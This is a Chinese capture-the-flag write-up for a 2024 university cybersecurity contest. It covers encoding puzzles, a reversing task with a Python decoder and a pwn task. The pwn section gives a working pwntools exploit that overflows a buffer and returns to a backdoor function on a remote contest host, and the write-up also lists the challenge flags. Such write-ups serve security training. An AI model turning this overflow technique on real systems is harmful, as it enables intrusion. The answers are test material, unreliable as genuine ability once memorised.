2024高校网络安全管理运维赛题目--复现+题目+wp

简介: 2024高校网络安全管理运维赛题目--复现+题目+wp

比赛官网

比赛官网

部分writeup

Signin

如图所示GIF提取,然后简单的ROT13

flag{welcome-to-signin-quiz}

邮件

----如图所示简单的base64

邮件flag{WeLCoMeto}

邮箱flag{phishHUntInG}

Babyre

解析:放到IDA分析,看伪代码

得到AncsA6gXMSMoMqIuNCMuxaYuAGIavC9=关键字符转

分析得到是类似base64的加密但又不完全是

写python代码对关键字符串处理

def reverse_alnum(input_str):
    result = []
    for char in input_str:
        if char.isalpha():
            # 大写字母A-Z替换为Z-A
            if char.isupper():
                result.append(chr(90 - (ord(char) - 65)))
            # 小写字母a-z替换为z-a
            else:
                result.append(chr(122 - (ord(char) - 97)))
        elif char.isdigit():
            # 数字1-9替换为9-1
            if char != '0':
                result.append(str(9 - int(char) + 1))
            else:
                result.append('0')  # 0保持不变
        else:
            # 非字母数字字符保持不变
            result.append(char)
    return ''.join(result)

# 示例
input_str = input("请输入一个包含英文字符和数字的字符串:")
output_str = reverse_alnum(input_str)
print("替换后的字符串为:", output_str)

最后base64解密

答案flag{B4se64_1s_s0_e4sy}

Pwn

解释:看代码呀

构造输入的内容溢出然后ret到后门函数(简单的ret2text)

答案:flag{kOoD1EijiemeePh8IeNei2XOL8ich5de}

from pwn import *
#context(os='linux',arch='amd64',log_level='debug')
#p=process('./pwn')
elf=ELF('./pwn')
libc = ELF('libc.so.6')
p=remote("prob07.contest.pku.edu.cn",10007)
#gdb.attach(p, 'b *0x40121d')

bin_sh_address_chuancan=0x40117a


ret = 0x40121e

offset=0x78

payload1=b'31:MEQCIHOFrdjB9js6X862TKy0BVBCbHCJyY9DFzfczTllh8GuAiA7m5orfJ0SRZt6xI_ZEE__jRp8V9V8YIP13k61RG9quw=='
p.sendline(payload1)

payload2=b'a'*offset + p64(bin_sh_address_chuancan)
p.sendlineafter(b'Enter your username: ',payload2)
p.sendline(payload2)
#pause()
p.interactive()

Gateway解析:

找到这个文件 ,十进制的ASCII的转换

答案:flag{ad1985868133e8cf1828cb84adbe5a5b}

题目资源

题目资源

有时间我再自己完全的做一遍,未完待续~

答案当然是要最后看哒:

官方writeup

集思广益

比较好的备份

相关文章
|
2月前
|
数据采集 机器学习/深度学习 人工智能
运维人的“福音”?AI 驱动的自动化网络监控到底香不香!
运维人的“福音”?AI 驱动的自动化网络监控到底香不香!
182 0
|
3月前
|
人工智能 运维 监控
阿里云携手神州灵云打造云内网络性能监测标杆 斩获中国信通院高质量数字化转型十大案例——金保信“云内网络可观测”方案树立云原生运维新范式
2025年,金保信社保卡有限公司联合阿里云与神州灵云申报的《云内网络性能可观测解决方案》入选高质量数字化转型典型案例。该方案基于阿里云飞天企业版,融合云原生引流技术和流量“染色”专利,解决云内运维难题,实现主动预警和精准观测,将故障排查时间从数小时缩短至15分钟,助力企业降本增效,形成可跨行业复制的数字化转型方法论。
149 6
|
3月前
|
机器学习/深度学习 人工智能 运维
AI为网络可靠性加“稳”——从断网烦恼到智能运维
AI为网络可靠性加“稳”——从断网烦恼到智能运维
181 2
|
9月前
|
机器学习/深度学习 人工智能 运维
企业内训|LLM大模型在服务器和IT网络运维中的应用-某日企IT运维部门
本课程是为某在华日资企业集团的IT运维部门专门定制开发的企业培训课程,本课程旨在深入探讨大型语言模型(LLM)在服务器及IT网络运维中的应用,结合当前技术趋势与行业需求,帮助学员掌握LLM如何为运维工作赋能。通过系统的理论讲解与实践操作,学员将了解LLM的基本知识、模型架构及其在实际运维场景中的应用,如日志分析、故障诊断、网络安全与性能优化等。
265 2
|
4月前
|
机器学习/深度学习 人工智能 运维
让AI“接管”网络运维,效率提升不只是传说
让AI“接管”网络运维,效率提升不只是传说
426 16
|
5月前
|
机器学习/深度学习 数据采集 运维
机器学习在网络流量预测中的应用:运维人员的智慧水晶球?
机器学习在网络流量预测中的应用:运维人员的智慧水晶球?
243 19
|
4月前
|
存储 运维 监控
阿里云飞天洛神云网络子系统“齐天”:超大规模云网络智能运维的“定海神针”
阿里云飞天洛神云网络子系统“齐天”:超大规模云网络智能运维的“定海神针”
158 3
|
7月前
|
数据采集 机器学习/深度学习 人工智能
基于AI的网络流量分析:构建智能化运维体系
基于AI的网络流量分析:构建智能化运维体系
1203 13
|
7月前
|
SQL 运维 安全
网络安全等级保护2.0 定级、评测、实施与运维-复习题目资料
本文详细总结了网络信息安全等级保护的练习题,包括单选题、多选题、判断题和简答题。供朋友们参考复习,学习相关领域知识参考。
|
7月前
|
SQL 安全 网络安全
网络安全与信息安全:知识分享####
【10月更文挑战第21天】 随着数字化时代的快速发展,网络安全和信息安全已成为个人和企业不可忽视的关键问题。本文将探讨网络安全漏洞、加密技术以及安全意识的重要性,并提供一些实用的建议,帮助读者提高自身的网络安全防护能力。 ####
180 17